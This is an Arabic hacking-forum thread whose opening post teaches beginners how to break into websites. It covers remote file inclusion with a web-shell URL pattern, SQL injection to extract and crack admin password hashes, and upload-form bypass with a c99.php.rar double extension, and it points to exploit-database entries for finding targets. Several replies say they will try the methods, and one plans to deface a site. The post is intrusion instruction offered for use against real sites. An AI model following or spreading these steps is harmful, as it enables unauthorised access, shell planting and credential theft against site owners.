المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : إستغلال أخطر الثغرات remote file include طريقك للإحتراف بإذن الله من هذا الدرس



millen!um
07-08-2010, 06:54 AM
طبعا إخواني نعلم أن كل شيء صنعه الإنسان فيه أخطاء فهو بشر و ليس إله لذلك فالثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
منافذ لدخول الى المواقع .. والوصول الى السيرفر

Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا



1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability ))
يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )
وهذا تكملة لما قلته لكم طبعا منذ قليل بأن كل شيء صنعه الإنسان فيه أخطاء


- ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )

على سبيل المثال ... عندى موقع www.google.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو almuhajer
فان الثغرة والاستغلال يكون بهذا الشكل ...
/ww.google.com/vb/faq.php?almuhajer=إسم الشل.txt?cmd


تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


www.google.com/Folder/pag.php?incloud=youshell.txt?
الموقع = www.xxx.com
مجلد السكربت = Folder
الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
المتغير الى نربط به الملف الخارجى ( الشل ) incloud
علامة =
الشل بصغية تكتس = youshell.txt
وعلامة ؟


وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود

لكن كيف يا مهاجر سنعرف هذه الملفات التي تحوي أخطاء و بالتالي نستغلّها ؟؟
هناك مواقع ستساعدنا مثل

من هذه المواقع http://milw0rm.org وكذلك http://securityfocus.com


طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود
هذا مثال على الثغرة http://milw0rm.org/exploits/4607



و هناك عدة أنواع من الشل تختلف في عدة أشياء مثل تخطي السايف مود و التنقل و الإمكانية التي تتيحها لك على السيرفر وفق صلاحياتك

النوع الثاني من الثغرات
ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...

ناخذ مثال على هذا النوع http://milw0rm.org/exploits/4620





النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل ة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar


تحيّاتي لكم
almuhajer
منتديات جيوش الهكرز

millen!um
07-08-2010, 06:58 AM
و الله الشرح متعوب فيه أين الردود ؟؟ لن أضع دروس إذا لم أرى تفاعل
أضن إنوا الشرح سيّئ
الله يهديكم

عآزف الكيبورد
07-08-2010, 07:07 AM
والله الشرح تمام
وتستاهل أحلى رد وتقييم
وان شاء الله اجربها الآن
تقبل مروري
اخوك
عآزف الكيبورد

millen!um
07-08-2010, 07:34 AM
بـــــــارك الله فيك على تشجيعي دائما أخي

krkr333
07-08-2010, 03:58 PM
تستاهل كل احترام على المعلومات القيمه
شكرا جزيلا وننتظر منك المزيد

millen!um
07-08-2010, 06:59 PM
تستاهل كل احترام على المعلومات القيمه
شكرا جزيلا وننتظر منك المزيد

مشكور أخي على مرورك العطر ...بارك الله فيك

alnoofe07 HaCkeR
07-08-2010, 08:17 PM
موضوع اكثر من راااااااااااااائع فديتك يااقلبي ..! وجاري تنزيل السكبريت لاايجاد الثغره فيه ...! وتجربته ....! وان شااء الله اوريك الاندكس لموقع ابااحي ...!...

millen!um
07-08-2010, 08:50 PM
مشكور أخي ..إن شاء الله
منور الموضوع

هكرز الايميلات
07-09-2010, 09:02 PM
شرح وافي لبىآآ قلبك وجاري التجربة ^_+

awras
07-11-2010, 09:16 AM
شكرااا اخي والله افدتني كثيراا
وغالبا نحتاج الى خداع المركز بالامتداد c99.php.rar
مشكور كتير

millen!um
07-11-2010, 11:11 AM
شكرااا اخي والله افدتني كثيراا
وغالبا نحتاج الى خداع المركز بالامتداد c99.php.rar
مشكور كتير

بارك الله فيك و كما قال رسول الله صلّى الله عليه و سلّم
لا خير في كاتم للعلم
تحياتي لك..

ked
07-12-2010, 10:51 PM
مشكوووووووووووووورررررررر ررررررررررررررر ...............

killer_hacker
07-13-2010, 03:26 AM
http://arabcheart.com/up/uploads/images/arabcheart-4e9b86da59.gif

القط الأسود
07-13-2010, 10:10 AM
Thankkkkkkkkkkkkkkkkkkkkkks

T!F!NaR
07-13-2010, 01:35 PM
مشكور اخي على الموضوع الرائع
بارك الله فيك و جعله في ميزان حسناتك

bigegy
11-10-2010, 02:49 AM
مشكووووووووور

bachir66
12-05-2010, 11:47 PM
شكور على المجهود بــــــارك الله فــــــيك

صقر الحومة
12-19-2010, 02:37 PM
عاشت الايادي بارك الله فيك اخي شرح وافي وكافي مشكور خيو

abdo el7dad
12-21-2010, 06:57 AM
السلام عليكم ورحمة الله وبركاته الف شكر علي هذا الشرح ولك اجمل تحية

Resident Evil
12-27-2010, 08:43 PM
مشكووور حبيبي شرح احتراافي واصل ياملك

bachir66
01-07-2011, 12:33 AM
يعطيك آلف عافيه يالغالي
تقبل مروري المتوآضع

ibrahim_commu
02-12-2011, 03:50 PM
ممكن من فضلك لو فى شرح بالصور اوضح وياريت يكون فيه تطبيق مثال واقعى

سسعًدَ
02-13-2011, 01:21 AM
عافاك الله على الشرحً المبسطً اسلوبً جميلً ماشاللهً ..

reda sarese
02-13-2011, 01:24 AM
مشكور
و انشاء الله استفيد

habib gso
02-14-2011, 03:55 PM
شكرا و سوف احاول ان اجرب
تحيات

وردة السلام
02-14-2011, 05:23 PM
old exploit

remoute
02-17-2011, 04:20 AM
chokrnnnn a ghi mawdo3333 super

trojansim
09-29-2011, 04:00 AM
وتستاهل أحلى رد وتقييم

the black emo
09-29-2011, 06:05 PM
الله يعطك الصحة والعافيه

chakirov
10-02-2011, 03:15 PM
اخي الكريم وجدت صعوبه في فهم محتوى الموضوع

chakirov
10-02-2011, 03:16 PM
الرجاء تعديل الموضوع جيدا وشكرا لك

هكر الديوانيه
03-16-2012, 09:13 PM
مشكور ع الجهد البذول منك يا اخي الكريم

عبدالعزيز البلوي
03-29-2012, 08:05 AM
احلا التحايه واروع الاماني لك بالتوفيق

عبدالعزيز البلوي
03-29-2012, 08:05 AM
تقبل مروري

abdoobobo
06-29-2012, 09:04 AM
مشكورررررررررررررررر على الشرح الجميل

Fshma123456
06-29-2012, 09:26 AM
شرح متميز :eek:
مشكور وجزاك الله خير
ربي يوفقك:)

wasmed
06-29-2012, 09:54 AM
جازاك اللة الف خير على هذا الموضون
:redface:

ابـن غـزة
06-29-2012, 10:15 AM
http://www.3andna.com/photo/ToP/FWASEL/3ANDNA_FWASEL15.gif
رآآئـع يعطيك آلف عافية
http://www.3andna.com/photo/ToP/FWASEL/3ANDNA_FWASEL15.gif

abo_bshar
07-01-2012, 11:37 PM
مشكور عـ ـالطرح
سلمت الانامل

malek7696
07-17-2012, 12:15 AM
veryy gooddd

FURORIS
07-19-2012, 08:42 AM
جزاااااك الله خير

DEVil-X
07-19-2012, 11:14 AM
مشكووووور اخي موضوووووووووع مفيد